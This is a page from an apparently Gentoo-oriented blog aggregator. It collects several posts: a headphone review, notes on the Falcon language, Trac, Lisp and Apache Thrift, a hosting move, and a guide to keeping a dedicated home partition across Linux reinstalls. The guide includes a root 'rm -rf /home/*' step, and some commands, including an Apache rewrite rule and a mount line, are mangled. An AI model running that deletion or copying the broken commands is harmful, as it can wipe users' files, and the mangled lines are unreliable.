And they feel wonderful. The pads are some kind of soft comfy velour fabric. These headphones are not manually adjustable; instead there are little 3-D flaps on top that auto-adjust on springs, and they seem to help equally distribute weight around your head so it isn't all bearing down directly on your ears. The lack of a proper "band" probably contributes to keeping them light. When you put the AD700's on, and you feel everything magically shift around to fit your head, it's a freakish (yet strangely entertaining) experience. I felt like a cyborg.

By comparison, you can't forget you're wearing SR80's. They are mostly metal and thick heavy plastic and they hurt after a half hour. The cups are hard plastic and the foam pads are oddly shaped so that your ear inevitably sits directly on the poky, scratchy plastic of the drivers. From the first day I owned the SR80's there was no mistaking that they were painful, and they've gotten far worse over time. I put up with the SR80's in spite of this because they sound great.

Which brings us to...

Sound quality

The AD700's really do sound awesome. I had my doubts how much different they'd be from my SR80's, but there is definitely a noticeable difference.

The AD700's are very detailed compared to the SR80's. The SR80's have an overwhelming amount of bass and it drowns out the vocals on a lot of my songs. I'd never noticed until I put on the AD700's and heard the difference.

My music of choice is metal, industrial, hard rock, soft rock, a bit of techno and J-pop, and they all sound great. I don't have to screw around with the equalizer settings on my MP3 player just to be able to hear the vocals clearly, as I sometimes did with the SR80's. The AD700's are probably what people call "neutral".

When I listened to one song of a live concert on the AD700's, I actually heard a police siren in the background as a cop car apparently drove down the street outside the concert hall. I'd listened to that song probably 50 times on my SR80's, and never heard that. There were actually many times this week when I was sitting in my office at work and heard what I thought was a sound behind me, and as I looked around trying to find what was making that noise, I realized it was in the music. It's a bit unnerving.

If your main criteria is bass, the SR80's are probably better. I thought I really liked bass to the exclusion of all else, but maybe I'm getting old or maybe my tastes are changing, because the bass on the AD700's is more than good enough for me. It's definitely weaker but it's also clearer.

Anything else I can say about these is going to be even more subjective and unhelpful than what I already wrote, but I think I do prefer the sound of the AD700's over the SR80's at this point. To be clear though, both of these headphones sound amazingly good and I was very happy with my SR80's for years and years. (The AD700's also have the advantage of being shiny and new and I'm sure this skews my opinion.)

Note that these are "open" headphones, so they will leak noise. People sitting next to you will hear your music. This isn't an issue for me but it may be for some.

Build quality

I won't be able to make a real comparison until I bang the AD700's around for four years in my briefcase like I did with my SR80's, but at a glance they certainly look and feel sturdy. Some of the ridiculous design flaws of the SR80's (like the ever-spinning cups that result in crimped and broken wires) are joyously absent in the AD700's. The headphone cord comes out of only one side of the headphones, which helps you not to feel like you're being strangled by two cords meeting under your chin as with the SR80's. The headphone wire itself is thinner than the SR80's but also feels more flexible and hopefully less likely to snap.

(The cord on both the SR80's is way too long, and I end up looping it and twist-tying it to avoid tripping over it or running it over in my office chair. But too long is better than too short.)

Even the box the AD700's came in was impressive. It had nice Japanese writing all over, and to open it was like unfolding origami.


I got the AD700's for less than $80, new. The MSRP is supposedly $250. I don't know if I got an insanely good deal or if the MSRP is artificially inflated, but you can still get the AD700's on Amazon for around $80 if you look around.

This is $10-20 cheaper than Grado SR80's. I don't think the price difference is significant. I think both headphones are easily worth $80-100. Are they worth $250? Er... maybe not.


ATH-AD700: I love these things. I suggest, nay, demand that you buy them. They feel and sound very good. I am glad I didn't get replacement Grado SR80's as I originally planned.

I think it is easily worth spending $100 to get a "good" pair of headphones. Even if all you listen to is a crappy MP3 player, it makes a huge difference in how much you will enjoy your music. But I also use headphones when I'm at my computer, or even when I'm gaming. For me music is essential for avoiding distractions while programming, and these headphones are excellent for that purpose (especially because of the comfort).

The only bad thing about the AD700's is how ridiculous I look wearing novelty-sized, bright purple headphones in public. Personally, I will pay the price of bearing that shame.

Falcon Programming Language

I have discovered a new programming language called Falcon. Pretty nice little programming language. It’s written in C with a little C++ and is very confused about what kind of language it wants to  be. It’s pretty fun to play around because I won’t lie, I have no honest use for it. But all jokes aside I like it pretty well, I think I’ll replace all my ruby shenanigans with falcon. Not that I write a lot of code in Ruby either but when I want to play I play in Ruby land. But from now on I’m going to play in Falcon land where everything is written in C/C++ (not just part of it like Ruby) and scripts are compiled in binaries before they are actually ran. Pretty nice. The only downside to it is there is no vim syntax file for it that I can find. But fear not! I have written one… err I have started one. It’s not perfect by any means and I’m sure it leaves a lot out and it is probably (okay I know it’s broken) in several places. But that’s the beauty of open source. So please help me with it if you know anything about vim syntax files and have an interest in Falcon.


Which brings me to my final point for the post. I have finally broken down (or got off my ass, however you look at it) and created an account at github. Now you can see just how worthless an open source contributor I really am :) .

Enjoy the Penguins!

UPDATE: Nothing makes you look more like a tool then to have someone correct you the moment after you post to the world. A syntax file does exist for vim. I think I’m going to stick to mine but update the broke parts based on his (this is open source after all). The only place I know to find what I suppose is the “official” version  is on falcon’s svn:


Posts for Monday, August 17, 2009

Dedicated Home Partition



How to use the same home partition for reinstalling a distro or using a new distro but wanting to use the same home partition (i.e. preferences, Documents…)

Before Installing

Find the user and group id’s (uid and gid) on your current distro before reinstalling/adding new distro and write them down:


And the username of your regular user:


Get your home partition fstab entry:

grep home /etc/fstab

If your fstab uses a UUID, keep in mind that this will change if you change your partition map.

Note: If only wanted to change the permissions on the home partition to match a new install, see the final step.


During the installation process the you will be asked about partitioning. You should not partition unless you know what you are doing. Some distro’s will safely allow resizing and adding new partitions. Some partitions tools can safely shrink, expanded, and add new partition. If you need a new partition or a reorganization of partitions consider adding gparted to the installer CD if it isn’t already and partitioning with that.

When you got your disk partitioned, start the installer and manually set the partitions you plan to use. Don’t use the dedicated home partition or the installer will likely erase it. Also during the install don’t use the username from your previous install, likely the installer will choose a different uid and gid so this is best not to, later matching id’s will be set. Finish installation and reboot.

After Reboot

Exit if automatically logged in and goto console Ctl+Alt+F1. Log in as root (or ‘su -‘ to root from regular user if on Ubuntu) and find out what the newly created user uid/gid is.

id <new-username>

Keep a note of the groups the distro added and also be sure the new user didn’t get the same uid as the one you already had.

Add a new user:


For username select your old username, for uid match the old one. If you’d like to prevent possible uid conflicts in the future, consider using a higher uid like 1050. Enter gid to match the one you are using on the new system. Then add the groups that match the user that the distro created.

You can also use the ‘useradd‘ command but I find the former easier. For example on my gentoo system:

useradd -d /home/user --uid 1050 -G adm,audio,cdrom,cdrw,fcron,portage,users,usb,video,wheel -s /bin/bash

Delete distro created user:

userdel <username>

And delete the folder in the home directory for that user:

rm -rf /home/*

This will delete everthing in the home folder (it is not sane to mount a partition on an folder containing contents.)

Add home partition to fstab

Add the home partition to be loaded at boot (if already not added). For example:

nano /etc/fstab ... /dev/sda5 /home ext4 defaults 0 1

Besure to enter the correct filesytem type and settings.

Now reboot and login to your new user.

Match your home partition to your new distro ids

Warning: If you’ve done the above you’re already done, don’t this.

Mount the home partition and change to the directory of the dedicated home partition:

mount /dev/<home-partition> cd /mnt/<home partition>

Then change the old user and group id’s to the new one:

find . -uid <old-uid-number> -gid <old-gid-number> -exec chown -h <username>:<usergroup> {} +

This will change permissions on all files/folders/links that have both the old uid number and gid number. Some (very few) files will not match but most programs will eventually write to them and update them. To update all file/folders/links:

find . -exec chown -h <username>:<usergroup> {} +

Random updates

Some fun with my Trac installs today. First of all, I converted them all to use the inherited .ini file, which avoids fun with “Why isn’t this change having any effect - oh, it’s not even looking at that!”

I also set up non-SSL access to the trac installs, and with a bit of rewrite magick, have it force logged in users to use SSL. This is actually pretty easy - set “secure_cookies=True” in the trac.ini, then setup the following rewrite rule in the non-SSL virtual host:

RewriteEngine On
RewriteRule ^/([^/]+)/login$1/login [L]

Logging in now always redirects to the SSL address, and the cookies are only valid for SSL. (Don’t forget to clear any existing cookies)

For some strange reason, the Icekap trac instance had decided to randomly corrupt itself - it continually claimed it needed upgrading while trac-admin said it didn’t. I solved this by, in the trac installs directory:

mv icekap icekap.bak
../trac-create icekap "Icekap" nosvn
cp icekap.bak/db/trac.db icekap/db/
cp icekap.bak/conf/trac.ini icekap/conf/

trac-create is my own script which optionally creates an svn repo, then creates the trac instance for it - params are: directory “Project Name” [nosvn]

The PPF MediawikiRC plugin has been slowly progressing - it can now handle delete actions nicely, as well as marking minor changes and new articles. There’s probably lots it’s still missing (for example, user blocks is one thing I know it could have extra handling for), but I plan to implement these on a “when I can be bothered” basis now - it’s “good enough” for what I use it for at the moment and I’d rather move on to other projects.

links for 2009-08-17

Posts for Sunday, August 16, 2009

Adding Common Lisp to Apache Thrift

Well, with cl-pack sitting in a (hopefully) finished state, I'm turning my attention back to what got me started on it in the first place: attempting to write Lisp support for Apache Thrift. Thrift is the RPC framework Facebook uses internally and they open sourced it a bit ago, and it made its way into the Apache incubator where it resides now getting all kinds of attention. Several languages have been added to it, and its been generally cleaned up. After watching a video on Facebook architecture I got interested in Thrift. When I found out there was no Lisp support I figured I'd take a stab at it. Apparently others have tried but disappeared, so as to weather I'll finish, we can only wait and see but it seems like a good challenge and something I'd very much like to see done.

The digression onto cl-pack was a wonderful little trip. I learned a bit more about Lisp and lots more about packaging software for Common Lisp. It was a good little project to cut my teeth on and hopefully better prepare me to see this through.

So wish me luck, I'll probably need it for this larger undertaking. Approach #1 is reading the Ruby code and then writing similar CLOS Lisp code. It seems like a decent approach off the top of my head.

Moved to Linode

My web host for a good long while was Futurehosting. My OS was Debian 4.0 (Etch). Strike one: as of now there's still no option to upgrade to a newer version of Debian. Debian lags so much to begin with, it's really painful ify ou want to use anything released in the past two years.

I had an unmanaged VPS. I ran a bunch of funky non-standard stuff on there and it ran mostly OK. I had to upgrade to get more RAM just so SBCL would run on it, which sucked but I don't know that another host would've been any better.

The good thing about Futurehosting was that they responded very fast to tickets. The bad thing was the fact that I had ample opportunity to know this. The server would go down randomly once every month or two. I'd open a ticket saying "Hi my server is down", then things would be working again in a half hour, but why did this happen so often? I don't know. An awful lot of "failed switches". I wonder how often this happened without my knowing about it, given how often it happened in the middle of my using the server for something.

With all the hardware they were burning through I would've expected upgrades or price reductions over time, given that I was a steady customer for so long and that disk space and memory keeps becoming cheaper and cheaper in the world. But the prices always stayed the same, which was another strike.

Being hosted there was annoying but never annoying enough to switch. And migrating all of my sites and data to another server seemed like a huge pain. Momentum: the worst enemy of progress.

I moved to a new host on a whim recently: Linode. It was far less painful than I expected. Thanks to Linux and plaintext config files, it was mostly a SCP-it-all-over and tweak process. It took me one evening and a bit of time the next morning. Linode offers a lot of OSes which is also nice.

I pay less for Linode than I did at FH (and I get fewer resources at Linode, but I don't need much). Thus far I'm astonished how much faster things are running on the server. Even goofing off at a terminal, the shell is more responsive. My email loads instantly in kmail instead of lagging for a second. I never knew what I was missing. Linode's DNS control panel is also pretty braindead simple to use.

Futurehosting gets a C+ from me. It worked and my website existed, but it didn't knock my socks off. Hopefully Linode is better.

Install Lisp ASDF packages as a user with CLC

CLC or Common Lisp Controller is a system that other Lisp systems user to keep track of ASDF systems (a mouthful I know). By default, system packages are installed to /usr/share/common-lisp/ but what happens if you don't have root access but still want to leverage the ease of use CLC installed ASDF packages provide?

clc-register-user-package to the rescue! Create ~/.clc/source and put your ASDF package there, then simply run

$ clc-register-user-package ~/.clc/source/package/package.asd

and volia, you can (require :package) from any of your Lisp systems there after.

It's pretty awesome. :)

Planet Larry is not officially affiliated with Gentoo Linux. Original artwork and logos copyright Gentoo Foundation. Yadda, yadda, yadda.